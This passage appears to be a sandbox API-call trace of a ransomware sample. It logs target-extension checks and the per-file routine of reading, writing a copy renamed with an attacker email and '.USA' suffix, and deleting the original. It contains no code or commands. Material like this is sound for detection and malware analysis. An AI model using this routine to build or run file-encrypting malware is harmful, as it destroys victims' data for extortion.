[0034.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.332] lstrlenW (lpString=".1cd") returned 4 [0034.332] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.332] lstrlenW (lpString=".jpg") returned 4 [0034.332] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.332] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.332] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0034.332] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.333] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=3186) returned 1 [0034.333] CloseHandle (hObject=0x178) returned 1 [0034.333] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0034.333] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.333] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.333] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.334] GetLastError () returned 0x0 [0034.334] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xc72, lpOverlapped=0x0) returned 1 [0034.335] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xc80, lpOverlapped=0x0) returned 1 [0034.336] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.336] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.336] SetEndOfFile (hFile=0x17c) returned 1 [0034.336] CloseHandle (hObject=0x17c) returned 1 [0034.337] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.337] SetEndOfFile (hFile=0x178) returned 1 [0034.338] CloseHandle (hObject=0x178) returned 1 [0034.338] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.338] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.338] lstrlenW (lpString=".doc") returned 4 [0034.338] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString=".docx") returned 5 [0034.338] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.338] lstrlenW (lpString=".pdf") returned 4 [0034.338] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".xls") returned 4 [0034.339] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".xlsx") returned 5 [0034.339] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.339] lstrlenW (lpString=".ppt") returned 4 [0034.339] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString=".zip") returned 4 [0034.339] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.339] lstrlenW (lpString=".rar") returned 4 [0034.339] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".bz2") returned 4 [0034.339] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".7z") returned 3 [0034.339] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString=".dbf") returned 4 [0034.339] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString=".1cd") returned 4 [0034.339] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString=".jpg") returned 4 [0034.339] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.339] lstrlenW (lpString=".doc") returned 4 [0034.339] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".docx") returned 5 [0034.339] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.339] lstrlenW (lpString=".pdf") returned 4 [0034.339] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.339] lstrlenW (lpString=".xls") returned 4 [0034.340] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString=".xlsx") returned 5 [0034.340] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.340] lstrlenW (lpString=".ppt") returned 4 [0034.340] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.340] lstrlenW (lpString=".zip") returned 4 [0034.340] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.340] lstrlenW (lpString=".rar") returned 4 [0034.340] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString=".bz2") returned 4 [0034.340] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString=".7z") returned 3 [0034.340] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.340] lstrlenW (lpString=".dbf") returned 4 [0034.340] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.340] lstrlenW (lpString=".1cd") returned 4 [0034.340] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.340] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.340] lstrlenW (lpString=".jpg") returned 4 [0034.340] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.340] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.340] lstrlenW (lpString="Setup.xml") returned 9 [0034.340] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.341] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=4207) returned 1 [0034.341] CloseHandle (hObject=0x178) returned 1 [0034.341] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.341] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.341] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.341] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.341] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.341] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.341] GetLastError () returned 0x0 [0034.341] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x106f, lpOverlapped=0x0) returned 1 [0034.479] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1070, lpOverlapped=0x0) returned 1 [0034.492] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.492] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.492] SetEndOfFile (hFile=0x17c) returned 1 [0034.492] CloseHandle (hObject=0x17c) returned 1 [0034.493] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.493] SetEndOfFile (hFile=0x178) returned 1 [0034.493] CloseHandle (hObject=0x178) returned 1 [0034.494] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.494] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.494] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.494] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.494] lstrlenW (lpString=".doc") returned 4 [0034.494] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.494] lstrlenW (lpString=".docx") returned 5 [0034.494] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.494] lstrlenW (lpString=".pdf") returned 4 [0034.494] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.494] lstrlenW (lpString=".xls") returned 4 [0034.494] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.494] lstrlenW (lpString=".xlsx") returned 5 [0034.494] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.494] lstrlenW (lpString=".ppt") returned 4 [0034.494] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.494] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".zip") returned 4 [0034.495] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.495] lstrlenW (lpString=".rar") returned 4 [0034.495] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString=".bz2") returned 4 [0034.495] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString=".7z") returned 3 [0034.495] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".dbf") returned 4 [0034.495] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".1cd") returned 4 [0034.495] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".jpg") returned 4 [0034.495] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".doc") returned 4 [0034.495] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString=".docx") returned 5 [0034.495] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.495] lstrlenW (lpString=".pdf") returned 4 [0034.495] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString=".xls") returned 4 [0034.495] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString=".xlsx") returned 5 [0034.495] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.495] lstrlenW (lpString=".ppt") returned 4 [0034.495] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.495] lstrlenW (lpString=".zip") returned 4 [0034.496] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.496] lstrlenW (lpString=".rar") returned 4 [0034.496] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.496] lstrlenW (lpString=".bz2") returned 4 [0034.496] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.496] lstrlenW (lpString=".7z") returned 3 [0034.496] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.496] lstrlenW (lpString=".dbf") returned 4 [0034.496] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.496] lstrlenW (lpString=".1cd") returned 4 [0034.496] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.496] lstrlenW (lpString=".jpg") returned 4 [0034.496] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.496] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.496] lstrlenW (lpString="Setup.xml") returned 9 [0034.496] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.496] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1852) returned 1 [0034.496] CloseHandle (hObject=0x178) returned 1 [0034.497] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.497] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.497] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.497] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.497] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.497] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.497] GetLastError () returned 0x0 [0034.497] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x73c, lpOverlapped=0x0) returned 1 [0034.499] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x740, lpOverlapped=0x0) returned 1 [0034.500] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.500] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.500] SetEndOfFile (hFile=0x17c) returned 1 [0034.500] CloseHandle (hObject=0x17c) returned 1 [0034.501] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.501] SetEndOfFile (hFile=0x178) returned 1 [0034.501] CloseHandle (hObject=0x178) returned 1 [0034.501] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.502] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.502] lstrlenW (lpString=".doc") returned 4 [0034.502] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString=".docx") returned 5 [0034.502] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.502] lstrlenW (lpString=".pdf") returned 4 [0034.502] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString=".xls") returned 4 [0034.502] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString=".xlsx") returned 5 [0034.502] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.502] lstrlenW (lpString=".ppt") returned 4 [0034.502] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.502] lstrlenW (lpString=".zip") returned 4 [0034.502] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.502] lstrlenW (lpString=".rar") returned 4 [0034.502] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString=".bz2") returned 4 [0034.502] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.502] lstrlenW (lpString=".7z") returned 3 [0034.502] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString=".dbf") returned 4 [0034.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString=".1cd") returned 4 [0034.503] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString=".jpg") returned 4 [0034.503] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString=".doc") returned 4 [0034.503] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString=".docx") returned 5 [0034.503] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.503] lstrlenW (lpString=".pdf") returned 4 [0034.503] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString=".xls") returned 4 [0034.503] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString=".xlsx") returned 5 [0034.503] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.503] lstrlenW (lpString=".ppt") returned 4 [0034.503] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.503] lstrlenW (lpString=".zip") returned 4 [0034.503] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.503] lstrlenW (lpString=".rar") returned 4 [0034.503] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString=".bz2") returned 4 [0034.503] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.503] lstrlenW (lpString=".7z") returned 3 [0034.504] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.504] lstrlenW (lpString="C:\\MSOCache\\All 